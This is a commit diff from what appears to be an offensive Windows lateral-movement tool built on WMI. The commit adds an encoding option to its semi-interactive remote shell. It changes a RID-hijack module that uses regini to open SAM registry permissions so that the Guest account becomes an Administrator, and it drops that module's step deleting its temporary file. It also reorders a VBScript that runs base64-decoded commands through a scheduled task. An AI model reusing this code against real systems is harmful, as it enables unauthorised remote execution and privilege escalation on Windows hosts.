[Exec-command] Add codec argument in semi-interactive shell

Signed-off-by: XiaoliChan <2209553467@qq.com>
XiaoliChan · May 6, 2023 · 7bb181c · 7bb181c
1 parent 993f2a6
commit 7bb181c
Show file tree

Hide file tree

Showing 3 changed files with 13 additions and 4 deletions.
diff --git a/lib/modules/exec_command.py b/lib/modules/exec_command.py
@@ -203,6 +203,7 @@ def do_help(self, line):
         print("""
  sleep {seconds}    - set interval time in command execution (default is 5 seconds).
  logging            - logging everythings.
+ codec {code}       - set encoding code
  exit               - exit.
 """)
 
@@ -219,6 +220,13 @@ def do_exit(self, line):
         self.dcom.disconnect()
         sys.exit(1)
 
+    def do_codec(self, line):
+        if all([line]):
+            self.codec = line
+            print("[+] Set encoding code to: %s" %self.codec)
+        else:
+            print("[+] Current encoding code: %s" %self.codec)
+
     def interval_Timer(self, seconds):
         for i in range(seconds,0,-1):
             print(f"[+] Waiting {i}s for next step.", end="\r", flush=True)

diff --git a/lib/modules/rid_hijack.py b/lib/modules/rid_hijack.py
@@ -48,7 +48,7 @@ def query_user(self):
         iWbemServices.RemRelease()
 
     def Permissions_Controller(self, action, user):
-        exec_command = EXEC_COMMAND(self.iWbemLevel1Login)
+        exec_command = EXEC_COMMAND(self.iWbemLevel1Login, codec="gbk")
         regini_Attr =[
             r'HKEY_LOCAL_MACHINE\SAM [1 17]',
             r'HKEY_LOCAL_MACHINE\SAM\SAM [1 17]',
@@ -78,7 +78,7 @@ def Permissions_Controller(self, action, user):
         else:
             cmd = ""
             for i in regini_Attr: cmd += r'echo %s >> C:\windows\temp\windows.ini && '%i
-            cmd += r"regini.exe C:\windows\temp\windows.ini && del /q /f C:\windows\temp\windows.ini"
+            cmd += r"regini.exe C:\windows\temp\windows.ini"
             exec_command.exec_command_silent(command=cmd)
 
     # Default is hijacking guest(RID=501) users to administrator(RID=500)

diff --git a/lib/vbscripts/Exec-Command-Silent.vbs b/lib/vbscripts/Exec-Command-Silent.vbs
@@ -1,4 +1,7 @@
 ' From wmihacker
+Dim command
+command = Base64StringDecode("REPLACE_WITH_COMMAND")
+
 Const TriggerTypeDaily = 1
 Const ActionTypeExec = 0
 Set service = CreateObject("Schedule.Service")
@@ -24,8 +27,6 @@ Set trigger = triggers.Create(7)
 Dim Action
 Set Action = taskDefinition.Actions.Create(ActionTypeExec)
 Action.Path = "c:\windows\system32\cmd.exe"
-Dim command
-command = Base64StringDecode("REPLACE_WITH_COMMAND")
 Action.arguments = "/Q /c " & command
 Dim objNet, LoginUser
 Set objNet = CreateObject("WScript.Network")